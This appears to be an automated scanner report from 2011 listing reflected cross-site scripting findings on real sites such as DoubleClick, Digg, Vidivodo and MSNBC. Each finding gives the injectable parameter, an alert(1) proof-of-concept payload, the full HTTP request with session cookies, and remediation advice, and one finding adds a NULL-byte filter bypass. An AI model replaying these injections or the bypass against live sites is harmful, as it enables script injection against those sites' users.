<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... nV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=19163406439bc2e"-alert(1)-"753a23f325e&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv% ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74280"-alert(1)-"91003d35e8d was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae74280"-alert(1)-"91003d35e8d&destination=;ord=1916340643? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae74280"-alert(1)-"91003d35e8d&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/ ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774d7"-alert(1)-"f6155fedbbb was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1774d7"-alert(1)-"f6155fedbbb&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1774d7"-alert(1)-"f6155fedbbb&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d0e9"-alert(1)-"9eff1f734f was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=441477849d0e9"-alert(1)-"9eff1f734f&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=441477849d0e9"-alert(1)-"9eff1f734f&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/db/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/ ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 946a5"-alert(1)-"1a0aec814e7 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G946a5"-alert(1)-"1a0aec814e7&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... twork_7999_Static.jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G946a5"-alert(1)-"1a0aec814e7&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d0ca"-alert(1)-"88694a35b67 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=2d0ca"-alert(1)-"88694a35b67 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=2d0ca"-alert(1)-"88694a35b67http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B62497243%3B4986-300/600%3B41751858/41769645/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://deals.t-mobi ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb657"-alert(1)-"f4d7486d038 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3671.MSNcashback.com/B5398653.8;sz=300x600;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!cb657"-alert(1)-"f4d7486d038&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=;ord=1916340643? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... _Spring_Largest4GNetwork_7999_Static.jpg"; var minV = 8; var FWH = ' width="300" height="600" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0004D/83000000000042004.1?!cb657"-alert(1)-"f4d7486d038&&PID=8572669&UIT=G&TargetID=44147784&AN=1916340643&PG=NBCDH1&ASID=8ebd6b6186fa4ed5a94430592bfa87ae&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af2/17/dc/%2a/z%3B240173615%3B0-0%3B0%3B6249724 ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef65d'-alert(1)-'8220c360d70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.mediageneral.wspa/indexef65d'-alert(1)-'8220c360d70;kw=containerlinkswelike;pos=1;sz=253x300;ord=219492970500141.38? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA
document.write('<!-- Template ID = 14867 Template Name = Container for Links We Like - 3 stacked -->\n<div class=\"ib_container\">\n <div class=\"ib_ad\" id=\"ib_div_pos1_1\">\n ');
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 25dfa<img%20src%3da%20onerror%3dalert(1)>af66eeb7010 was submitted in the q parameter. This input was echoed as 25dfa<img src=a onerror=alert(1)>af66eeb7010 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 6b952<script>alert(1)</script>065aa11fd08 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload d34bc<script>alert(1)</script>eafa3fbf5c1 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=0J2F1ltJ97i&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Bd34bc<script>alert(1)</script>eafa3fbf5c1 HTTP/1.1 Host: cdnt.meteorsolutions.com Proxy-Connection: keep-alive Referer: http://www.discoverbing.com/mobile/index.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f515"><script>alert(1)</script>482e6e08913 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_star-telegram_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html&ctxtCat=news&outputCharEnc=latin1&css_url=http://media.star-telegram.com/static/mi/yahoo/css/yahoo.css3f515"><script>alert(1)</script>482e6e08913&tg=1&du=1&cb=1303613697383&ctxtContent=%3Chead%3E%3Clink%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%20href%3D%22%2F%2Fs7.addthis.com%2Fstatic%2Fr07%2Fwidget57.css%22%20media%3D%22all%22%3E%0A%20%0A%0A%0A%0A%0A%0A%0A%3Cscript%20language%3D%22JavaScript%22%3E%0A%3C!--%20%0Avar%20gomez%3D%7B%20%0A%09gs%3A%20new%20Date().getTime()%2C%20%0A%09acctId%3A'D3FD89'%2C%20%0A%09pgId%3A'story-detail'%2C%20%0A%09grpId%3A'Star%20Telegram'%20%0A%7D%3B%0A%0A%0Avar%20gomez%3Dgomez%3Fgomez%3A%7B%7D%3Bgomez.h3%3Dfunction(d%2C%20s)%7Bfor(var%20p%20in%20s)%7Bd%5Bp%5D%3Ds%5Bp%5D%3B%7Dreturn%20d%3B%7D%3Bgomez.h3(gomez%2C%7Bb3%3Afunction(r)%7Bif(r%3C%3D0)return%20false%3Breturn%20Math.random()%3C%3Dr%26%26r%3B%7D%2Cb0%3Afunction(n)%7Bvar%20c%3Ddocument.cookie%3Bvar%20v%3Dc.match(new%20RegExp('%3B%5B%20%5D*' HTTP/1.1 Host: cm.npc-mcclatchy.overture.com Proxy-Connection: keep-alive Referer: http://www.star-telegram.com/2011/04/23/3022014/your-smartphone-knows-where-youve.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BX=76of9et6r747t&b=3&s=m1
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 03:11:09 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: UserData=02u3hs9yoaLQsFTjBpsjNxNHFxMXQ0cTS3dXJXM0%2bLSi4sTU1JNbEBACNDCzdzUxMXJ2MAF7dYLQ0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 21-Apr-2021 03:11:09 GMT Cache-Control: no-cache, private Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 4702
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
The value of the offer request parameter is copied into the name of an HTML tag. The payload 141d3><script>alert(1)</script>de459fc0b76 was submitted in the offer parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /subscriptions?offer=%22/%3E%3Cscript%3Ealert('JavaScript%20causes%20cancer')%3C/script%3E%3Cbr141d3><script>alert(1)</script>de459fc0b76 HTTP/1.1 Host: dailymail.subscribeonline.co.uk Proxy-Connection: keep-alive Referer: http://www.reddit.com/search?q=xss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ce19f"><script>alert(1)</script>ee3f151a8b3 was submitted in the REST URL parameter 1. This input was echoed as ce19f"><script>alert(1)</script>ee3f151a8b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00ce19f"><script>alert(1)</script>ee3f151a8b3 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 37473<script>alert(1)</script>bae200dcf22 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.star-telegram.com/p.json?callback=_ate.ad.hpr37473<script>alert(1)</script>bae200dcf22&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.star-telegram.com%2F2011%2F04%2F23%2F3022014%2Fyour-smartphone-knows-where-youve.html&1wijfoh HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh39.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303529621.1FE|1303529621.60|1303408224.66; dt=X; psc=4; uid=4dab4fa85facd099
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 24 Apr 2011 03:12:26 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24 May 2011 03:12:26 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 24 Apr 2011 03:12:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 24 Apr 2011 03:12:26 GMT Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12ea"><script>alert(1)</script>52c39204099 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /379705/kemal-ataturk-ve-albert-einsteinb12ea"><script>alert(1)</script>52c39204099 HTTP/1.1 Host: en.vidivodo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Video : kema ...[SNIP]... <link rel="canonical" href="http://www.vidivodo.com/379705/kemal-ataturk-ve-albert-einsteinb12ea"><script>alert(1)</script>52c39204099" /> ...[SNIP]...
2.26. http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://en.vidivodo.com
Path:
/379705/kemal-ataturk-ve-albert-einstein
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f156c"><script>alert(1)</script>d1a37a5a2a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /379705/kemal-ataturk-ve-albert-einstein?f156c"><script>alert(1)</script>d1a37a5a2a0=1 HTTP/1.1 Host: en.vidivodo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>Video : kema ...[SNIP]... <link rel="canonical" href="http://www.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein?f156c"><script>alert(1)</script>d1a37a5a2a0=1" /> ...[SNIP]...
2.27. http://gadgetbox.msnbc.msn.com/_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd71b"><script>alert(1)</script>c573188b1d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /_news/2011/04/19/6497264-mini-crossbow-shoots-flaming-firework-darts?fd71b"><script>alert(1)</script>c573188b1d1=1 HTTP/1.1 Host: gadgetbox.msnbc.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sat, 23 Apr 2011 14:23:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 89931
2.28. http://gadgetbox.msnbc.msn.com/_news/2011/04/20/6497264-mini-crossbow-shoots-flaming-firework-darts [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9386e"><script>alert(1)</script>d85df39341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sat, 23 Apr 2011 14:49:26 GMT Connection: close Vary: Accept-Encoding Content-Length: 90175
The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 54d54<img%20src%3da%20onerror%3dalert(1)>ebff4bedb1c was submitted in the path parameter. This input was echoed as 54d54<img src=a onerror=alert(1)>ebff4bedb1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Length: 550 Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sat, 23 Apr 2011 14:25:41 GMT Connection: close Vary: Accept-Encoding
The value of the startingZoom request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e9e0"><script>alert(1)</script>352e8afc084 was submitted in the startingZoom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
